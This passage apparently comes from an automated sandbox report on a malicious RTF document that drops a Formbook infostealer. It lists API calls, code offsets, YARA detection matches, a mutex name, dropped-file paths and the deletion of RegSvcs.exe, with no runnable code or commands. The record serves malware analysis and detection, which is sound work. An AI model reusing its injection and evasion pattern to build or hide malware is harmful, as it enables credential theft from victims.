          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C10D0 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C0060 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C01D4 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C010C NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C1148 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C07AC NtCreateMutant,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BF8CC NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BF938 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C1930 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFAB8 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFA20 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFA50 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFB50 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC30 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC48 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C0C40 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C1D80 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFD5C NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFE24 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFFFC NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F700C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F707AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F701D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F71148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F710D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F71930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F71D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099E10 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099E90 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099E8A NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003541BE
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00353738
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00350908
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00353C48
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00350ED0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003525E8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00353728
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00356930
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003529C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00356B84
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00358DDF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00350EC0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00CA1891
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00CA18A0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04875918
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04871593
          Source: C:\Users\Public\vbc.exeCode function: 4_2_048765FF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04878684
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04870007
          Source: C:\Users\Public\vbc.exeCode function: 4_2_04870048
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0487C3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D160
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041DAD4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E3C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D686
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041DF72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E7CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CE0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008FD005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D3040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008E905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0094D06D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095D13F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CE2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00971238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009763BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CF3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008F63DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D2305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D7353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0091A37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008E1489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00905485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095443E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0090D47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009735DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009505E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008EC5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00916540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D4680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008DE6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0091A634
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00972622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008DC7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009057C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0096771D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0094F8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0096F8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008DC85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008F286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0097098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D29B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009649F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008E69FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00955955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095394B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00983A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0097CBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095DBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CFBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00956BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008F7B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00972C9C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095AC5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0096FDDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00900D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008DCD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00902E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008EEE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0096CFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00942FDC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095BF14
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008E0F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008FDF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02021238
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7E0C6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9905A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F83040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020263BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FAD005
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA63DB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7F3CF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FCA37B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F87353
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F82305
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7E2E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9C5F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02022622
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FC6540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8351F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F91489
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB5485
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FBD47D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0200579A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB57C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0200443E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8C7BC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8E6C1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F84680
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FCA634
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F969FE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F829B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02033A83
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA286D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8C85C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202CBA4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0200DBDA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7FBD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F8EE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA7B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0200394B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02005955
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202098E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8CD5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB0D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201CFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FF2FDC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FADF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F90F3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9EE4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB2E2F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FDDD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009D160
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00082D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00089E3C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00089E40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009DF72
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00082FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01F7E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01F7DF5C appears 119 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FC3F92 appears 132 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FC373B appears 244 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FEF970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 008CE2A8 appears 60 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0093F970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00913F92 appears 132 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0091373B appears 253 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 008CDF5C appears 130 times
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: pp[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@12/8@3/3
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$wBU8MyzT.rtfJump to behavior
          Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\DGxsVlh
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE169.tmpJump to behavior
